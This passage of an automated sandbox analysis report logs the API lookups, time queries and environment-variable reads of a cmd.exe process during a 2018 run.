| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7546a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75473b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75454a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7546a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-06-06 09:52:21 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10940818 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\qj4SUKboE\Desktop |
|
1 |
